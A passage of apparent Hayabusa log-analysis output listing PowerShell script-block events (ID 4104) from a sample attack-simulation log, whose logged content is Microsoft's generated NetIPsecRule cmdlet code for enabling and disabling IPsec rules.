$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_v",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"alues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and 